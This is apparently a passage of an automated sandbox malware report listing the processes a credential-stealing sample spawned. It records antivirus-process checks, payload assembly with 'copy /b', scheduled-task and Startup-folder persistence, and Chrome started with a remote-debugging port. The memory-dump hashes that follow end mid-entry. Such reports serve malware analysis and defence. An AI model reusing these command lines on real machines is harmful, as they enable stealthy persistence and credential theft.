                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2178551936.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 79%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:23
                                                                                                                                                                          Start time:01:23:29
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                          Imagebase:0x7a0000
                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:24
                                                                                                                                                                          Start time:01:23:29
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:26
                                                                                                                                                                          Start time:01:23:31
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                          Imagebase:0x7a0000
                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:27
                                                                                                                                                                          Start time:01:23:31
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:28
                                                                                                                                                                          Start time:01:23:31
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd /c md 197036
                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:29
                                                                                                                                                                          Start time:01:23:31
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
                                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:30
                                                                                                                                                                          Start time:01:23:32
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:31
                                                                                                                                                                          Start time:01:23:32
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:Jurisdiction.pif T
                                                                                                                                                                          Imagebase:0x280000
                                                                                                                                                                          File size:893'608 bytes
                                                                                                                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 5%, ReversingLabs
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:32
                                                                                                                                                                          Start time:01:23:32
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                          Imagebase:0xeb0000
                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:33
                                                                                                                                                                          Start time:01:23:32
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"
                                                                                                                                                                          Imagebase:0x590000
                                                                                                                                                                          File size:526'848 bytes
                                                                                                                                                                          MD5 hash:26D8D52BAC8F4615861F39E118EFA28D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 50%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:34
                                                                                                                                                                          Start time:01:23:33
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:35
                                                                                                                                                                          Start time:01:23:33
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:36
                                                                                                                                                                          Start time:01:23:33
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:37
                                                                                                                                                                          Start time:01:23:34
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                                                                                                                                                                          Imagebase:0x7ff6fee10000
                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:38
                                                                                                                                                                          Start time:01:23:34
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:39
                                                                                                                                                                          Start time:01:23:34
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:40
                                                                                                                                                                          Start time:01:23:36
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
                                                                                                                                                                          Imagebase:0x7ff7c9320000
                                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:41
                                                                                                                                                                          Start time:01:23:39
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                                                                                                                                                                          Imagebase:0x5e0000
                                                                                                                                                                          File size:893'608 bytes
                                                                                                                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 5%, ReversingLabs
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:42
                                                                                                                                                                          Start time:01:23:41
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"
                                                                                                                                                                          Imagebase:0xa70000
                                                                                                                                                                          File size:3'024'384 bytes
                                                                                                                                                                          MD5 hash:6250E716BE9BB3618C85DA75BB8A8351
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2783203653.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2743575261.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2637900652.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2592686398.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:43
                                                                                                                                                                          Start time:01:23:42
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:44
                                                                                                                                                                          Start time:01:23:44
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
                                                                                                                                                                          Imagebase:0x7ff7c9320000
                                                                                                                                                                          File size:170'496 bytes
                                                                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:45
                                                                                                                                                                          Start time:01:23:44
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"
                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                          File size:660'480 bytes
                                                                                                                                                                          MD5 hash:BDF3C509A0751D1697BA1B1B294FD579
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:46
                                                                                                                                                                          Start time:01:23:44
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:47
                                                                                                                                                                          Start time:01:23:45
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                                                                                                                                                                          Imagebase:0x5e0000
                                                                                                                                                                          File size:893'608 bytes
                                                                                                                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:48
                                                                                                                                                                          Start time:01:23:48
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"
                                                                                                                                                                          Imagebase:0x380000
                                                                                                                                                                          File size:334'848 bytes
                                                                                                                                                                          MD5 hash:FBA8F56206955304B2A6207D9F5E8032
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 75%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:49
                                                                                                                                                                          Start time:01:23:53
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                          Imagebase:0x3c0000
                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:50
                                                                                                                                                                          Start time:01:23:53
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                          Imagebase:0x80000
                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Reset < >
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e77e4ca19f308b8fae2b582c78d6ea96626f70ee0e2879ce90c25f511d9b368b
                                                                                                                                                                            • Instruction ID: 0536a7af0339c3b2f3829b9695bf10ae3a3972b03626d250a6b89428fa1247cd
                                                                                                                                                                            • Opcode Fuzzy Hash: e77e4ca19f308b8fae2b582c78d6ea96626f70ee0e2879ce90c25f511d9b368b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0AF019FB2CC110BEB00185853A549FA676EE2C2730370D82AF403C5D22F2D46E8A7131
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6be85814a5726eff318bd69ad841cbc103a08b1859e241e125cc96d7300ee604
                                                                                                                                                                            • Instruction ID: d5bfd87cf95b217391732255383d444d99cdbbaa4b7214a51558e30830de0c2b
                                                                                                                                                                            • Opcode Fuzzy Hash: 6be85814a5726eff318bd69ad841cbc103a08b1859e241e125cc96d7300ee604
                                                                                                                                                                            • Instruction Fuzzy Hash: DA014FB73CC121BEA101D5856A849FA77AEF7D2630370946AF403C6D23F295A9897131
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c69d36b5f6b226c18ae86a503c270fe358e8e60dfdd98b3eee2b514e9155d9d5
                                                                                                                                                                            • Instruction ID: 0c52716111bd1ac2bfc99088e13061f404a602e25aa4269dd3db82557681dda8
                                                                                                                                                                            • Opcode Fuzzy Hash: c69d36b5f6b226c18ae86a503c270fe358e8e60dfdd98b3eee2b514e9155d9d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 24F062BA2CC110FEA1018A8966945FA776EF792270770946AF442C6922F2D0698A7230
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_4e10000_file.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1d07bda2a66ece35313eebb150993af79bae62713da46bef2475d9e0403d6d00
                                                                                                                                                                            • Instruction ID: 03ae38243b32eb2edb74f2152b8b1f78d16ef3b3f9266fe727b9bf37e7b1ee4d
